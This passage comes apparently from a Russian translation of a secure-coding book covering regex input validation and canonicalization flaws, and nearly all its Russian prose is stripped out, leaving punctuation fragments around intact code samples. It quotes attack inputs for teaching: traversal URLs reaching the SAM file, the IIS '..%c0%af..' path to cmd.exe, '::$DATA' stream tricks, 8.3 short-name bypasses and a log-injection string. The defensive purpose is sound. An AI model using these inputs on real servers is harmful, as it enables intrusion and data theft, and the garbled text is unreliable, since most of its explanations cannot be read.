RegExp r = [a!z]{1,8}\.[a!z]{1,3};
if (r.Match(strFilename).Success) {
// '! strFilename;
// .
} else {
// !!! .
}
, 18
, 13
( ). ? 
? , c:\boot.ini? 
, c:\boot.ini
boot.ini, . .
, :

^[a!z]{1,8}\.[a!z]{1,3}$
^ , $ .
: ( ) 1
8 , 13 
, . , c:\boot.ini 
, : \ 
.

304

II

Unicode
, 8
, ,
! Unicode? 
, , , 
? , 
.
Unicode 
Unicode Regular Expression Guidelines http://
www.unicode.org/reports/tr18. 
Unicode .
Unicode 
:
Unicode ( );
Unicode . Windows 
UTF16 (little endian). , 
Windows ;
;
Unicode .
: ,
Unicode, , .
, Perl 5.8.0 Unicode.
.NET Framework Microsoft,
. ,
Unicode.
, 
, . , 
:

;
( )
, . , 
? cafe?

,
\u30FB:

Regex r = new Regex(@"^[\u30A1!\u30FA]+$");


Unicode \p{<
>},
Unicode. .NET Framework Perl 5.8.0
Unicode, .

10

305

Unicode (L), (M), (N),


(P), (S), (Z) (O C).
:
L ( ):
Lu ( );
Ll ( );
Lt ( ). , 
(diagraph), . ,
,
Latin ExtendedB: U+01C8 Lj, .
: LJ (U+01C7), lj (U+01C9);
Lm (, );
Lo ( , , , );
( ):
Mn (, , 
);
Mc ( , );
Me (, , );
N ( ):
Nd ( 0 9. 
, , . ,

Nl (, ), Nd);
Nl ( , U+2160 U+2182);
No ( , ,
);
P ( ):
Pc (, , ,
);
Pd ( );
Ps ( , {, ( [);
Pe ( , }, ) ]);
Pi ( , , );
Pf ( , , , );
Po ( , ?, ! ..);
S ( ):
Sm ();
Sc ( );
Sk (, );
So ( , 
);

306

II

Z ( ):
Zs (, );
Zl ( U+2028, (U+00A6)
);
Zp ( U+2029);
O ():
Cc (, , 
, );
Cf ( , ,
);
Co ( , );
Cn ( );
Cs ( ).
Unicode 
http://oss.software.ibm.com/developerworks/opensour
ce/icu/ubrowse.
. Web
,
. :

Regex r = new Regex(@"^\p{Sc}{1}$");


if (r.Match(strInput).Success) {
// !
} else {
// .
}
, ,
Unicode, ($), ( ), ( ),
( ), ( ), ( ) .
,
:

Regex r = new Regex(@"^[\p{L}\p{Mn}\p{Zs}]+$");


\p{Mn} ,
.
.NET Framework , 
\p{IsHebrew} (), \p{IsArabic} () \p{IsKatakana} (
).
Windows 2000,
Windows XP Microsoft Windows .NET Server 2003 Unicode (
Arial Unicode MS* ) Character Map (. 103).

( arialuni.ttf) Microsoft Word 2000/XP.


,
. . .

10

307

, Unicode
Unicode. Unicode http://www.unicode.org/
charts.

. 103. Character Map ,


ASCII
, Perl 5.8.0 
Unicode \p{}. http://
dev.perl.org/perl5/news/2002/07/18/580ann/perldelta.html#new%20unico
de%20properties.

! :

.
, ,
!

*
, 
.
,
. 


V , : , 
.
. 
, , 
, 1799 . . .

308

II

Perl C#, 

.

, . (:
, 
.)

Perl
Perl ,
 . 
Perl, :

$_ = " 12:15 .";


if (/.*(\d{2}:\d{2}[ap]m)/i) {
print $1;
}
: 
, $_. 
$_, :

var =~ /<>/;


, C#, C++, Microsoft Visual
Basic .NET, ASP.NET , .NET Framework 
System.Text.RegularExpressions. 
.
C#, Visual Basic .NET C++.

C#
// C#.
String s = @" 12:15 .";
Regex r = new Regex(@".*(\d{2}:\d{2}[ap]m)",RegexOptions.IgnoreCase);
if (r.Match(s).Success)
Console.Write(r.Match(s).Result("$1"));

Visual Basic .NET


' Visual Basic .NET.
Imports System.Text.RegularExpressions
...
Dim s As String
Dim r As Regex
s = " 12:15 ."
r = New Regex(".*(\d{2}:\d{2}[ap]m)", RegexOptions.IgnoreCase)

10

309

If r.Match(s).Success Then
Console.Write(r.Match(s).Result("$1"))
End If

C++
// C++.
#using <mscorlib.dll>
#include <tchar.h>
#using <system.dll>
using namespace System;
using namespace System::Text;
using namespace System::Text::RegularExpressions;
...
String *s = S" 12:15 .";
Regex *r = new Regex(".*(\\d{2}:\\d{2}[ap]m)",IgnoreCase);
if (r!>Match(s)!>Success)
Console::WriteLine(r!>Match(s)!>Result(S"$1"));
ASP.NET ,
.


JavaScript 1.2 
, Perl. 4, Netscape Navigator Microsoft
Internet Explorer .

var r = /.*(\d{2}:\d{2}[ap]m)/;
var s = " 12:15 .";
if (s.match(r))
alert(RegExp.$1);
VBScript 5
RegExp:

Set r = new RegExp


r.Pattern = ".*(\d{2}:\d{2}[ap]m)"
r.IgnoreCase = True
Set m = r.Execute(" 12:15 .")
MsgBox m(0).SubMatches(0)

,
.
ASP JScript VBScript,
Web.

310

II

C++
! , C++
, ,
. STL (Standard
Template Library), STL Regex++ http://
www.boost.org ( http://www.ddj.com/documents/s=1486/ddj0110a/0110a.htm
.)
Microsoft Visual C++ Microsoft Visual Studio .NET 
ATL , CAtlRegExp. 
, Regex++ CAtlRegExp
; 
, .
CAtlRegExp http://msdn.microsoft.com/library/enus/vclib/html/
vclrfcatlregexp.asp.
CAtlRegExp:

#include <AtlRX.h>

CAtlRegExp<> re;
re.Parse(".*{\\d\\d:\\d\\d[ap]m}",FALSE);
CAtlREMatchContext<> mc;
if (re.Match(" 12:15 .", &mc)) {
const CAtlREMatchContext<>::RECHAR* szStart = 0;
const CAtlREMatchContext<>::RECHAR* szEnd = 0;
mc.GetMatch(0,&szStart, &szEnd);
ptrdiff_t nLength = szEnd ! szStart;
printf("%.*s",nLength, szStart);
}

,


, , C++,
C# Visual Basic .NET. UserInput C++:

#include <string>
using namespace std;
class UserInput {
public:
UserInput(){};
~UserInput(){};
bool Init(const char* str) {
// .
if(!Validate(str)){
return false;

10

311

} else {
input = str;
return true;
}
}
const char* GetInput(){return input.c_str();}
DWORD Length(){return input.length();}
private:
bool Validate(const char* str);
string input;
};
. ,
,
UserInput, , . , 

Validate. Init ,
. 
, Canonicalize.
,
.

,
, :
. ,
. : 
.
, 
;
. ,
,
. :
, .
,
, .
, 
, , ,  .

11

,
: ,
, , , .
? , .
(Gertrude Stein), . ?
, ?
ROSE* : roze, ro$e, r0se r%6fse? ,
. , , ,
. , %6f 
ASCII o.
? 
: , ,
, , 
,
( ) . 
(canonicalization)
, 
.
, , 
, 
Web 
. , .

Rose . . .

11

313



, , .

(Johann Pachelbel) (16531706). Random House Websters
College Dictionary (Random House, 2000) : 
. , 
 ,
. 
,
. , c:\dir\test.dat, test.dat
..\..\test.dat .

c:\dir\test.dat. , , ,
.



, , , 
. , 
, . ,
. ,
, .

Napster
 
.
2001 ., ,
, Napster, 
(Recording Industry Association of America, RIAA),
. Napster 
, . 
, :
, , 
Napster.
Siouxsie and the Banshees: Candyman AndymanCay (
), 92 degrees 92 degree$,
Deepest Chill Deepest Chi11. ,
, , ,
.
.
Web http://news.cnet.com/news/
010052005042145.html.

314

II

Mac OS X Apache
Web Apache, Mac OS X 
Apple,
Hierarchical File System Plus (HFS+). HFS+ ,
Apache.
, 
, . , 
scripts :

<Location /scripts>
order deny, allow
deny from all
</Location>
, http://www.northwindtra
ders.com/scripts/index.html, . http://
www.northwindtraders.com/SCRIPTS/index.html, Index.html 
.
 , HFS+, 
, Apache, Mac OS X,
. , Apache SCRIPTS ,
scripts, . HFS+ SCRIPTS
scripts ,
index.html.
http://www.securityfocus.com/
archive/1/190036.

DOS
, MSDOS 
Windows .
, , (aux) 
(lpt1 prn). ,
Windows 95 Windows 98 . Windows 
,
, .
http://www.microsoft.com/technet/security/bulletin/MS00017.asp.

/tmp
StarOffice Sun
, 
UNIX Linux. (symbolic link, symlink)
, ; , 
. UNIX ,
(hard link). ,
symlink .

11

315

Windows 2000 Create


HardLink.
, /tmp/frodo
UNIX (/etc/passwd) 
.
StarOffice /tmp/soffice.tmp, 
. UNIX
, 0777, , Everyone
( ). /tmp/soffice.tmp
. StarOffice, 
( 
,
).
.
, /tmp/soffice.tmp /etc/passwd 
StarOffice , /etc/passwd .
http://www.securityfocus.com/bid/1922.


. , , 
,
.
! 
, , ,
, .

! 
, !

Windows
Windows ,
. 
, 
, .

8.3
, , , FAT, 
MSDOS, : 8
3 (, , ).
FAT32 NTFS , , NTFS
255 Unicode. 
NTFS FAT32 8.3,

316

II

MSDOS 16 Windows 


.
8.3 
: 6 ,
(~) ( 
1 9), 3 .
, My Secret File.2001.Aug.doc MYSECR~1.DOC.
,
.
, 
, . 
Fiscal02Budget.xls 172.30.x.x, 
, 
, ,
. , Fiscal02Budget.xls Fiscal~1.xls 
.
:

String SensitiveFiles[] = {"Fiscal02Budget.xls", "ProductPlans.Doc"};


IPAddress RestrictedIP[] = {172.30.0.0, 192.168.200.0};
BOOL AllowAccessToFile(FileName, IPAddress) {
If (FileName In SensitiveFiles[] && IPAddress In RestrictedIP[])
Return FALSE;
Else
Return TRUE;
}
BOOL fAllow = FALSE;
// .
fAllow = AllowAccessToFile("Fiscal02Budget.xls", "172.30.43.12");
// . !
fAllow = AllowAccessToFile("FISCAL~1.XLS", "172.30.43.1 2");
, , ,
MSDOS 16 Windows
, , 8.3.
.
8.3: 
,
. ?
8.3 ! 
.

11

317

NTFS
,
: ,
. , 
.asp, IIS Asp.dll. 
.asp::$DATA, IIS , 
NTFS, ASP.

, Streams.exe Sysinternals (http://www.sysinternals.com),
Crucial ADS Crucial Security (http://www.crucialsecurity.com)
Security Expressions Pedestal Software (http://www.pedestalsoft
ware.com).
,
, , 
. , 
(access control list, ACL)
ACL .


, (.) (\), 
, .
Win32,
, ,
. ,
Web, 17. ,
, (. Secureco2\Chapter11\Trai
lingDot):

#include <strsafe.h>
char b[20];
StringcbCopy(b, sizeof(b), "Hello!");
HANDLE h = CreateFile("c:\\somefile.txt",
GENERIC_WRITE,
0, NULL,
CREATE_ALWAYS,
FILE_ATTRIBUTE_NORMAL,
NULL);
if (h != INVALID_HANDLE_VALUE) {
DWORD dwNum = 0;
WriteFile(h, b, lstrlen(b), &dwNum, NULL);
CloseHandle(h);
}
h = CreateFile("c:\\somefile.txt.", // .
GENERIC_READ,
0, NULL,
OPEN_EXISTING,

318

II

FILE_ATTRIBUTE_NORMAL,
NULL);
if (h != INVALID_HANDLE_VALUE) {
char b[20];
DWORD dwNum =0;
ReadFile(h, b, sizeof b, &dwNum, NULL);
CloseHandle(h);
}
?
CreateFile somefile.txt
, somefile.txt 
. ,
! , somefile.txt. somefile.txt ,
.

\\?\
( ANSI)
MAX_PATH (260). Unicode 
32 000 Unicode, 
\\?\. .
260 .
\\?\c:\temp\myfile.txt , c:\temp\myfile.txt.

\\?\, .

(..)
, , Web FTP
, . 
,
.
.


, c:\datafiles. ,

. , ..\boot.ini,
(
) , , . .\winnt\repair\sam,
(Security Account Manager, SAM)
.
( , Windows 2000 
Active Directory, SAM.) 
, L0phtCrack ( http://www.atsta
ke.com), .
!

11

319

Windows 2000 SAM [


(SysKey)], 
. SysKey Windows NT System Key Permits
Strong Encryption of the SAM (http://support.microsoft.com/support/kb/
articles/Q143/4/75.asp) Microsoft Knowledge Base.

?
c:\dir\foo\files\secret
c:\dir\foo\myfile.txt:
c:\dir\foo\files\secret\..\..\myfile.txt;
c:\dir\foo\files\..\myfile.txt;
c:\dir\..\dir\foo\files\..\myfile.txt.
!


, , ? 
? , PATH? 
. ,
File.exe File.exe:
, PATH?

,
Windows, .
NTFS , 
. MyFile.txt myfile.txt .
:
POSIX (Portable Operating System Interface for UNIX).
,
, Apple Mac OS X Web Apache.

UNC

(Universal Naming Convention, UNC). UNC
Windows 
. UNC
. 
BlakeLaptop Files, 
c:\My Documents\Files. Z: 
, net use z: \\BlakeLaptop\Files. z:\my
file.txt c:\My Documents\Files\myfile.txt .
UNC ,
. , \\BlakeLaptop\Files\myfile.txt z:\myfile.txt. UNC
\\?\, \\?\UNC\BlakeLaptop\Files
\\BlakeLaptop\Files.

320

II

, Windows XP WebDAV (Webbased Distri


buted Authoring and Versioning),
Web , Add
Network Place Wizard ( ). ,
Web, 
.

:
API ( CreateFile)
, (named pipe) (mailslot).
,  
. 

(fireandforget). 
(
), , , 
, . : \\<_
>\pipe\<_>, :
\\<_>\mail
slot\<_>\.

:

Windows 
. , COM1
, AUX , LPT2
..
: CON, PRN, AUX, CLOCK$, NUL, COM1 COM9,
LPT1 LPT9. ,
NUL.txt, .
: . ,
C:\Program Files\COM1 , d:\North
WindTraders\COM1.
, , 
, ,
, . , 
. 
\documents\com1, . 
, ! ,
, .
, ,
, 
, . 
Web.

11

321


, , 
Windows. , Linux 
, , /dev/
mouse, /dev/console, /dev/tty0, /dev/zero .
, Mandrake
Linux 7.1 Netscape 4.73, , file:///
dev/mouse
. , file:///dev/zero
.
, Web <IMG
SRC=file:///dev/mouse>.
, 
.

Web
, , 
URL . , 
, . , .

AOL
America Online (AOL) 5.0 , 
Web 
. URL ,
Web ,
. : ,
. , ,

, Web ( )
URL.
(. http://www.slashdot.org/features/00/07/15/
0327239.shtml).

eEye
, SecureIIS, 
Internet Information Services (IIS). 
eEye (http://www.eeye.com) SecureIIS:
SecureIIS Web Microsoft Internet Information Services
. SecureIIS IIS 

Web
.

322

II

SecureIIS .
. , 
, ( ) 
, URL
action=delete. SecureIIS,
. , action=de
lete action=%64elete . %64 
d.
Web 
. , ,
URL, : http://www.northwindtraders.com/scripts/process.asp?fi
le=../../../winnt/repair/sam (
SAM). (..) (/), SecureIIS
. SecureIIS ,
: http://www.northwindtraders.com/scripts/process.asp?file=%2e%2e/%2e%2e/%2e
%2e/winnt/repair/sam. , , , %2e 
!
Web http://www.security focus.com/
bid/2742.

Internet Explorer 4. IP-


, Internet Explorer 4 ( Url
Mon.dll), , 
, . 
, Web. Web
,
Web, .
Internet Explorer 4 , 
, Web Local Intranet Zone (
) Internet Zone (). Web
, , http://www.microsoft.com,
Internet ( , ).
, (http://northwindtraders), Local Intranet,
NetBIOS .
? .
: IP Internet Explorer 

Internet, . 
. IP , 
, (dotless IP address) IP (dottedIP
address):

<IP > = (a 16777216) + (b 65536) + (c 256) + d


a.b.c.d .
, 192.168.197.100 3232286052. http://
192.168.197.100 Internet Explorer 4 , , 

11

323

Internet. http://3232286052 Internet Explorer 4


, , , 
, 
. 
Web .
: http://www.microsoft.com/technet/security/bulletin/MS98016.asp.

, ::$DATA
Internet Information Server 4.0
, IIS, 
. . NTFS, 
Windows NT , 
, Apple Macintosh HFS, 
, (fork), :
(data fork) (resource fork). (
Web http://support.microsoft.com/default.aspx?scid=kb;enus;Q147438.).
NTFS ,
. , ( Secureco2\Chap
ter11\NTFSStream) test Bar.txt (
bar.txt:test):

char *szFilename = "c:\\temp\\bar.txt:test";


HANDLE h = CreateFile(szFilename,
GENERIC_WRITE,
0, NULL,
CREATE_ALWAYS,
FILE_ATTRIBUTE_NORMAL,
NULL);
if (h == INVALID_HANDLE_VALUE) {
printf(" CreateFile() %d", GetLastError());
return;
}
char *bBuff = "Hello, stream world!";
DWORD dwWritten = 0;
if (WriteFile(h, bBuff, lstrlen(bBuff), &dwWritten, NUL L)) {
printf("!");
} else {
printf(" WriteFile() %d", GetLastError());
}
, 
:

more < bar.txt:test


echo, , 
:

echo Hello, Stream World! > bar.txt:test


more < bar.txt:test

324

II

.
, NTFS 
$DATA. ,
NTFS, :

more < boot.ini::$DATA


. 111 , .
( )

boot.ini::$DATA

. 111.

NTFS

NTFS , NTFS, 
 
. , , 16 now john3 readme
john3:16 readme:now.
.
. 
IIS . , 
.asp, ASP (Active Server Pages),
Asp.dll. IIS , 
Windows, ,
. 
, default
switch. , Data.txt,
, .txt, 
.
, Default.asp::$DATA.
, IIS .asp::$DATA 
. NTFS, , 
,
Default.asp. http://
www.microsoft.com/technet/security/bulletin/MS98003.asp.



/ .
, file.txt.
IP , ,
:

172.23.11.19 Mike

2002!09!03

13:02:43 file.txt

file.txt\r\n127.0.0.1\tCheryl\t20020903\t13:03:00\tsec
retfile.txt, :

11

172.23.11.19

Mike

2002!09!03

13:02:43 file.txt

127.0.0.1

Cheryl

2002!09!03

13:03:00 secretfile.txt

325

, Cheryl , (127.0.0.1)
? , .
, 
!
http://online.securityfocus.com/
archive/82/271498/20020509/20020515/2.

Web

Web 
. , URL Web
:
7 8 ASCII;
;
UTF8 ;
Unicode UCS2;
;
HTML ( Web, URL).

7- 8- ASCII-
, . 
, .


,
, .
, %20, ( )
%A3. URL, http:/
/www.northwindtraders.com/my%20document.doc http://www.northwindtraders.com/
my%20document%2Edoc my document.doc,
Northwind Traders.

SecureIIS eEye. ,
. 
, SecureIIS ,
.

UTF-8
RFC 2279 (http://www.ietf.org/rfc/rfc2279.txt) Unicode
8 (Eightbit Unicode Transformation Format, UTF8).
UTF8
, , 2 (UCS2) 4 (UCS4) Unicode

326

II

ASCII. , 
, .

UTF-8
UTF8 n ,
. , 7
ASCII (0x00 0x7F) 01100001, 0 
, 0, 1100001 7 , 
ASCII. , H, 
0x48 1001000 , UTF8 01001000
0x48. , 7 ASCII UTF8 .
, , 7
ASCII, Unicode, 0x7FFFFFFF. 
, 0x80 0x7FF 110xxxxx 10xxxxxx,
110 10 , x
. , 0xA3 
10100011 . UTF8
11000010 10100011 : 0xC2 0xA3. 
. UTF8 
(. 111).

11-1.

UTF-8

0x000000000x0000007F

0xxxxxxx

0x000000800x000007FF

110xxxxx 10xxxxxx

0x000008000x0000FFFF

1110xxxx 10xxxxxx 10xxxxxx

0x000100000x001FFFFF

11110xxx 10xxxxxx 10xxxxxx 10xxxxxx

0x002000000x03FFFFFF

111110xx 10xxxxxx 10xxxxxx 10xxxxxx 10xxxxxx

0x040000000x7FFFFFFF

1111110x 10xxxxxx 10xxxxxx 10xxxxxx 10xxxxxx,


10xxxxxx

 :
, UTF8
. UTF8 
. ,
(?) 0x3F 00111111 
. ,
, :
0xC0 0xBF
0xE0 0x80 0xBF
0xF0 0x80 0x80 0xBF
0xF8 0x80 0x80 0x80 0xBF
0xFC 0x80 0x80 0x80 0x80 0xBF
UTF8 ,
, 0x3F.

11

327

, , UTF8,
IIS 4 IIS 5 .
%c0%af URL
, : http://servername/scripts/..%c0%af../winnt/sys
tem32/cmd.exe. , %c0%af? 11000000
10101111, UTF8, . 81,
11000000 10101111. , 00000101111
0x2F, , (/)! UTF8
(overlong sequence).
, URL, http://<_
>/scripts/../../winnt/system32/cmd.exe. ,
scripts, ,
, system32,
Cmd.exe.

Web http://www.micro
soft.com/technet/security/bulletin/MS00057.asp.

Unicode UCS-2
UCS2 
UTF8. UCS2 (Universal Character
Set) , ASCII
, %uNNNN, NNNN
Unicode. , %5C UTF8 ASCII (\),
%u005C , 2 Unicode.
, , %u005C 
Unicode, (fullwidth)
. Unicode
.
%uFF00 %uFFEF 
%20 %7E. , \
%u005C %uFF3C.


,
, , 
, . 
, UTF8 (%5c) : %,
5 c, , UTF8: %25, %35
%63. . 112
(\).
, 
, 
. , 
, .

328

II

11-2.

%5c

UTF8

%255c

%25 %, 5 c

%%35%63

%, %35 5 %63 c

%25%35%63

%, 5, c UTF8

HTML
HTML ,
. , (< >) &lt; &gt; 
&pound;. ! 

, 
. , &lt; , &#3C; (
<) &#60; ( <). 
http://
www.w3.org/TR/REChtml40/sgml/entities.html.
, Web , , 
, 
. 
.



2002 (Alex
Gontmakher), The Homograph
Attack ( ) (http://www.cs.technion.ac.il/~gabr/pubs.html). 
,
, (. 112).

. 112. localhost, ? .
localhost ,
ASCII o

11

329

, localhost 
o, (U+043E),
, . , 
, 
. , ,
: a, c, e, p, y, x, H, T M.
/ (U+2044) / (U+002F). ,
. Unicode , 
14.
(0)
O.
, , URL
,
. , , 
localhost, 1ocalhost?



, ,
, . 
: , 
.
.



, ,
.
(ACL)
. , , ! 
. , IIS ,
, ASP VBScript
Microsoft JScript, , 
. , , .
IIS, , , .
IIS, ::$DATA, 
, IIS .
, IP
. 
, ,
IP, DNS ,
.
! , ,
. 
.

330

II



10, . 

, , , 
. , ,
. :
:
C D;

;
 
, 32 , 
txt, jpg gif.
.

. 
, , .
(
10):

^[cd]:(?:\\\w+)+\\\w{1,32}\.(txt|jpg|gif)$
:
c:\mydir\myotherdir\myfile.txt;
d:\mydir\myotherdir\someotherdir\picture.jpg.
:
e:\mydir\myotherdir\myfile.txt ( );
c:\fred.txt ( );
c:\mydir\myotherdir\..\mydir\myfile.txt ( ,
AZaz09 );
c:\mydir\myotherdir\fdisk.exe ( );
c:\mydir\myothe~1\myfile.txt ( );
c:\mydir\myfile.txt::$DATA ( ,
$ );
c:\mydir\myfile.txt. ( );
\\myserver\myshare\myfile.txt ( );
\\?\c:\mydir\myfile.txt ( ).
,
. :
, , .

11

331

! ,
.
.
: 
, .
 . .
: , , 
.

8.3
.
, . 
8.3, 
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem
:

NtfsDisable8dot3NameCreation : REG_DWORD : 1
: .

PATH

PATH . 
, . , 
PATH,
c:\myhacktools, %systemroot%  !
PATH ? : 
,  
.
Windows XP 
:
, PATH.
,
. : HKEY_LOCAL_MACHINE\Sys
tem\CurrentControlSet\Control\Session Manager\SafeDllSearchMode. 
: DWORD, 0.
1 system32.

, 
. 
, .

332

II


, ,
Win32.
, 
, .
, 
, 
. , CleanCanon ,
.
1. , mysecretfile.txt.
2. . , mysecretfile.txt ,
mysecr~1.txt, mysecretfile.txt::$DATA mysecretfile.txt. ( ) 
.
3. ,
MAX_PATH, .
DoS .
4. ( 
) c:\myfiles , c:\myfi
les\mysecretfile.txt. \\?\ ,
, 
.
5. GetFullPathName
(..).
6. GetLongPathName ,
. , mysecr~1.txt mysec
retfile.txt. ,
2. !
7. , . 
. GetFileType ,
FILE_TYPE_DISK, , 
.
, Linux
UNIX. , ,
C C++ stat
stat.st_mode S_IFREG (0x0100000),
, .
CleanCanon, Visual C++ .NET
Win32:

/*
CleanCanon.cpp
*/
#include "stdafx.h"
#include "atlrx.h"
#include "strsafe.h"

11

#include <new>
enum errCanon {
ERR_CANON_NO_ERROR = 0,
ERR_CANON_INVALID_FILENAME,
ERR_CANON_INVALID_PATH,
ERR_CANON_NOT_A_FILE,
ERR_CANON_NO_FILE,
ERR_CANON_NO_PATH,
ERR_CANON_TOO_BIG,
ERR_CANON_NO_MEM};
errCanon GetCanonicalFileName(LPCTSTR szFilename,
LPCTSTR szDir,
LPTSTR *pszNewFilename) {
//
//
//
if

(szDir
return

,
MAX_PATH
== NULL)
ERR_CANON_NO_PATH;

size_t cchDirLen = 0;
if (StringCchLength(szDir,MAX_PATH,&cchDirLen) != S_OK ||
cchDirLen > MAX_PATH)
return ERR_CANON_TOO_BIG;
*pszNewFilename = NULL;
LPTSTR szTempFullDir = NULL;
HANDLE hFile = NULL;
errCanon err = ERR_CANON_NO_ERROR;
try {
// 2
// (! ,
// 1!4 ! ).
// ( ! '\').
// .
CAtlRegExp<> reFilename, reDirname;
CAtlREMatchContext<> mc;
reFilename.Parse(_T("^\\a+\\.\\a\\a?\\a?\\a?$"),FALSE);
if (!reFilename.Match(szFilename,&mc))
throw ERR_CANON_INVALID_FILENAME;
reDirname.Parse(_T("^\\c:\\\\[a!z0!9\\\\]+$"),FALSE);
if (!reDirname.Match(szDir,&mc))
throw ERR_CANON_INVALID_FILENAME;
size_t cFilename = lstrlen(szFilename);
size_t cDir = lstrlen(szDir);

333

334

II

//
// " " (\).
size_t cNewFilename = cFilename + cDir + 1;
// 3
// , MAX_PATH .
if (cNewFilename > MAX_PATH)
throw ERR_CANON_TOO_BIG;
// .
// '\\?\' '\0'.
LPCTSTR szPrefix = _T("\\\\?\\");
size_t cchPrefix = lstrlen(szPrefix);
size_t cchTempFullDir = cNewFilename + 1 + cchPrefix;
szTempFullDir = new TCHAR[cchTempFullDir];
if (szTempFullDir == NULL)
throw ERR_CANON_NO_MEM;
//
//
//
//
//
if

4
.
\\?\, ,

.
(StringCchPrintf(szTempFullDir,
cchTempFullDir,
_T("%s%s\\%s"),
szPrefix,
szDir,
szFilename) != S_OK)
throw ERR_CANON_INVALID_FILENAME;
// 5
// ,
// (..), .
TCHAR szFullPathName [MAX_PATH + 1];
LPTSTR szFilenamePortion = NULL;
DWORD dwFullPathLen =
GetFullPathName(szTempFullDir,
MAX_PATH,
szFullPathName,
&szFilenamePortion);
if (dwFullPathLen > MAX_PATH)
throw ERR_CANON_NO_MEM;
// 6
//
if (GetLongPathName(szFullPathName,
szFullPathName,
MAX_PATH) == 0) {
errCanon errName = ERR_CANON_TOO_BIG;
switch (GetLastError()) {
case ERROR_FILE_NOT_FOUND :

11

335

errName = ERR_CANON_NO_FILE;
break;
case ERROR_NOT_READY :
case ERROR_PATH_NOT_FOUND :
errName = ERR_CANON_NO_PATH;
break;
default : break;
}
throw errName;
}
// 7
// ?
hFile = CreateFile(szFullPathName,
0,0,NULL,
OPEN_EXISTING,
SECURITY_SQOS_PRESENT | SECURITY_IDENTIFICATION,
NULL);
if (hFile == INVALID_HANDLE_VALUE)
throw ERR_CANON_NO_FILE;
if (GetFileType(hFile) != FILE_TYPE_DISK)
throw ERR_CANON_NOT_A_FILE;
// , !
// ,
// (pszNewFilename).
const size_t cNewFilenane = lstrlen(szFullPathName)+1;
*pszNewFilename = new TCHAR[cNewFilenane];
if (*pszNewFilename != NULL)
StringCchCopy(*pszNewFilename,cNewFilenane,szFullPathName);
else
err = ERR_CANON_NO_MEM;
} catch(errCanon e) {
err = e;
} catch (std::bad_alloc a) {
err = ERR_CANON_NO_MEM;
}
delete [] szTempFullDir;
if (hFile) CloseHandle(hFile);
return err;
}
Secureco2\Chapter11\CleanCanon. Create
File : , , ,
, .

336

II

CreateFile
, , , dwFlags
AndAttributes . .
,
,
. . , , ,
. ,
, , ,
.
, 
, . ,
SECURITY_SQOS_PRESENT | SECURITY_IDENTIFICATION
, FILE_FLAG_OPEN_NO_RECALL, , 
, .
(Hierarchical Storage Manage
ment) .
Web.


Web
, 
, , 
.



.
, 
. : . 
: , ,
, .
,   ,
,   !

UTF-8
UTF8, 
Windows MultiByteToWideChar.
, 
UTF8. Secure
co2\Chapter11\UTF8. , UTF8 , 
WideCharToMultiByte, CP_UTF8.

void FromUTF8(LPBYTE pUTF8, DWORD cbUTF8) {


WCHAR wszResult[MAX_CHAR+1];
DWORD dwResult = MAX_CHAR;

11

337

int iRes = MultiByteToWideChar(CP_UTF8,


0,
(LPCSTR)pUTF8,
cbUTF8,
wszResult,
dwResult);
if (iRes == 0) {
DWORD dwErr = GetLastError();
printf("MultiByteToWideChar() !> %d\n", dwErr);
} else {
printf("MultiByteToWideChar() "
"%S (%d) \n",
wszResult,
iRes);
}
}

void main() {
// Unicode! 0x5c;
// (\).
BYTE pUTF8_1[] = {0x5C};
DWORD cbUTF8_1 = sizeof pUTF8_1;
FromUTF8(pUTF8_1, cbUTF8_1);
// Unicode! 0xC0 0xAF.
// .
// (/).
BYTE pUTF8_2[] = {0xC0, 0xAF};
DWORD cbUTF8_2 = sizeof pUTF8_2;
FromUTF8(pUTF8_2, cbUTF8_2);
// Unicode! 0xC2 0xA9;
// ().
BYTE pUTF8_3[] = {0xC2, 0xA9};
DWORD cbUTF8_3 = sizeof pUTF8_3;
FromUTF8(pUTF8_3, cbUTF8_3);
}

ISAPI
ISAPI , , , 

C C++, Web 
. IIS 6
SCRIPT_TRANSLATED,
URL, (, , ).

338

II

:
,
,
, 
.
, .
, .


, Web, , 
, .
DNS, northwindtraders.com. IP,
192.168.197.100. . 
localhost, IP
127.n.n.n. Windows NetBIOS,
\\northwindtraders.
, ,
?
,
. ( Secure
co2\Chapter11\CanonServer) 
.

/*
CanonServer.cpp
*/
for (int i = ComputerNameNetBIOS;
i <= ComputerNamePhysicalDnsFullyQualified;
i++) {
TCHAR szName[256];
DWORD dwLen = sizeof szName / sizeof TCHAR;
TCHAR *cnf;
switch(i) {
case 0 : cnf = "ComputerNameNetBIOS"; break;
case 1 : cnf = "ComputerNameDnsHostname"; break ;
case 2 : cnf = "ComputerNameDnsDomain"; break;
case 3 : cnf = "ComputerNameDnsFullyQualified"; break;
case 4 : cnf = "ComputerNamePhysicalNetBIOS"; break;
case 5 : cnf = "ComputerNamePhysicalDnsHostname "; break;
case 6 : cnf = "ComputerNamePhysicalDnsDomain"; break;
case 7 : cnf = "ComputerNamePhysicalDnsFullyQualified"; break;
default : cnf = "Unknown"; break;
}
BOOL fRet =
GetComputerNameEx((COMPUTER_NAME_FORMAT)i,

11

339

szName,
&dwLen);
if (fRet) {
printf("%s '%s' .\n", szName, cnf);
} else {
printf(" %d", GetLastError());
}
}
IP ( ) getaddrinfo
Windows Sockets (Winsock) Perl. 
, :

my ($name, $aliases, $addrtype, $length, @addrs)


= gethostbyname "mymachinename";
foreach (@addrs) {
my @addr = unpack('C4', $_);
print "IP: @addr\n";
}


, Windows 
: <>\<_>. SAM. 
, DEVELOPMENT\Blake Blake DEVE
LOPMENT. Windows 2000 
(user principal name, UPN),
: <_>@<>, blake@deve
lopment.northwindtraders.com.
:

bool AllowAccess(char *szUsername) {


char *szRestrictedDomains[]={"MARKETING", "SALES"};
for (i = 0;
i < sizeof szRestrcitedDomains /
sizeof szRestrcitedDomains[0];
i++)
if (_strncmpi(szRestrictedDomains[i],
szUsername,
strlen(szRestrictedDomains[i]) == 0)
return false;
return true;
}
false MARKETING SALES. 
, MARKETING\Brian false, Brian MARKETING.
, UPN brian@marketing.northwindtraders.com,
true, , 

.

340

II

Windows 2000 
SAM. SAM,
, : Win
dows NT 4, Windows 2000, Windows 2000 Active Directory Windows XP.

GetUserNameEx, (. Secureco2\Chapter11\Canon
User):

/*
CanonUser.cpp
*/
#define SECURITY_WIN32
#include <windows.h>
#include <security.h>
for (int i = NameUnknown ;
i <= NameServicePrincipal;
i++) {
TCHAR szName[256];
DWORD dwLen = sizeof szName / sizeof TCHAR;
TCHAR *enf = NULL;
switch(i) {
case 0 : enf = "NameUnknown"; break;
case 1 : enf = "NameFullyQualifiedDN"; break;
